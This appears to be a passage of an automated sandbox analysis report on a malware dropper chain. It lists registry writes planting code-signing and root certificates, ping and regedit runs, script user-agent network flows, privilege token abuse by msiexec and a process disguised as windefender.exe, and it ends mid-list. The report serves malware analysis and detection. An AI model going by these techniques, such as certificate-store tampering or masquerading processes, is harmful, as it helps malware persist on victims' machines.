\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 0f00000001000000200000002dc1a6a6cb0cb42f7e0d2c56f38bc7decbccd143405f669070ce130f9249ba48030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f tapinstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c00000001000000040000000008000004000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d4304000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe -
Runs .reg file with regedit 2 IoCs
pid Process 7160 regedit.exe 6236 regedit.exe -
Runs ping.exe 1 TTPs 6 IoCs
pid Process 4740 PING.EXE 4552 PING.EXE 4804 PING.EXE 1360 PING.EXE 1004 PING.EXE 5396 PING.EXE -
Script User-Agent 48 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 191 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 16024 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 18914 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 29777 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 33658 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 713 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 3795 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 24665 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 96 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 5289 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 5485 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 11531 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 11631 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 23912 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 26885 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 18031 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 99 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 190 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 216 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 289 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 12284 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 14583 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 15380 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 26286 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 26580 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 27817 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 121 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 203 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 16711 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 23942 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 28534 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 151 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 721 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 24699 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 26505 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 31056 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 101 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 117 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1280 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 12252 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 29786 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 251 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 306 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 18028 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 18797 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 31148 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 32452 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 32502 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3716 1615354024190.exe 3716 1615354024190.exe 2924 1615354028456.exe 2924 1615354028456.exe 3708 1615354033690.exe 3708 1615354033690.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4632 file.exe 4632 file.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 4320 multitimer.exe 1812 E93D.tmp.exe 1812 E93D.tmp.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 6772 Setup.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 5168 app.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 6656 windefender.exe 6656 windefender.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 4564 msiexec.exe Token: SeIncreaseQuotaPrivilege 4564 msiexec.exe Token: SeSecurityPrivilege 316 msiexec.exe Token: SeCreateTokenPrivilege 4564 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4564 msiexec.exe Token: SeLockMemoryPrivilege 4564 msiexec.exe Token: SeIncreaseQuotaPrivilege 4564 msiexec.exe Token: SeMachineAccountPrivilege 4564 msiexec.exe Token: SeTcbPrivilege 4564 msiexec.exe Token: SeSecurityPrivilege 4564 msiexec.exe Token: SeTakeOwnershipPrivilege 4564 msiexec.exe Token: SeLoadDriverPrivilege 4564 msiexec.exe Token: SeSystemProfilePrivilege 4564 msiexec.exe Token: SeSystemtimePrivilege 4564 msiexec.exe Token: SeProfSingleProcessPrivilege 4564 msiexec.exe Token: SeIncBasePriorityPrivilege 4564 msiexec.exe Token: SeCreatePagefilePrivilege 4564 msiexec.exe Token: SeCreatePermanentPrivilege 4564 msiexec.exe Token: SeBackupPrivilege 4564 msiexec.exe Token: SeRestorePrivilege 4564 msiexec.exe Token: SeShutdownPrivilege 4564 msiexec.exe Token: SeDebugPrivilege 4564 msiexec.exe Token: SeAuditPrivilege 4564 msiexec.exe Token: SeSystemEnvironmentPrivilege 4564 msiexec.exe Token: SeChangeNotifyPrivilege 4564 msiexec.exe Token: SeRemoteShutdownPrivilege 4564 msiexec.exe Token: SeUndockPrivilege 4564 msiexec.exe Token: SeSyncAgentPrivilege 4564 msiexec.exe Token: SeEnableDelegationPrivilege 4564 msiexec.exe Token: SeManageVolumePrivilege 4564 msiexec.exe Token: SeImpersonatePrivilege 4564 msiexec.exe Token: SeCreateGlobalPrivilege 4564 msiexec.exe Token: SeCreateTokenPrivilege 4564 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4564 msiexec.exe Token: SeLockMemoryPrivilege 4564 msiexec.exe Token: SeIncreaseQuotaPrivilege 4564 msiexec.exe Token: SeMachineAccountPrivilege 4564 msiexec.exe Token: SeTcbPrivilege 4564 msiexec.exe Token: SeSecurityPrivilege 4564 msiexec.exe Token: SeTakeOwnershipPrivilege 4564 msiexec.exe Token: SeLoadDriverPrivilege 4564 msiexec.exe Token: SeSystemProfilePrivilege 4564 msiexec.exe Token: SeSystemtimePrivilege 4564 msiexec.exe Token: SeProfSingleProcessPrivilege 4564 msiexec.exe Token: SeIncBasePriorityPrivilege 4564 msiexec.exe Token: SeCreatePagefilePrivilege 4564 msiexec.exe Token: SeCreatePermanentPrivilege 4564 msiexec.exe Token: SeBackupPrivilege 4564 msiexec.exe Token: SeRestorePrivilege 4564 msiexec.exe Token: SeShutdownPrivilege 4564 msiexec.exe Token: SeDebugPrivilege 4564 msiexec.exe Token: SeAuditPrivilege 4564 msiexec.exe Token: SeSystemEnvironmentPrivilege 4564 msiexec.exe Token: SeChangeNotifyPrivilege 4564 msiexec.exe Token: SeRemoteShutdownPrivilege 4564 msiexec.exe Token: SeUndockPrivilege 4564 msiexec.exe Token: SeSyncAgentPrivilege 4564 msiexec.exe Token: SeEnableDelegationPrivilege 4564 msiexec.exe Token: SeManageVolumePrivilege 4564 msiexec.exe Token: SeImpersonatePrivilege 4564 msiexec.exe Token: SeCreateGlobalPrivilege 4564 msiexec.exe Token: SeCreateTokenPrivilege 4564 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4564 msiexec.exe Token: SeLockMemoryPrivilege 4564 msiexec.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4564 msiexec.exe 5096 chashepro3.tmp 4472 Setup3310.tmp 4544 IBInstaller_97039.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 2596 wxqhvcpn0bf.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp -
Suspicious use of SetWindowsHookEx 42 IoCs
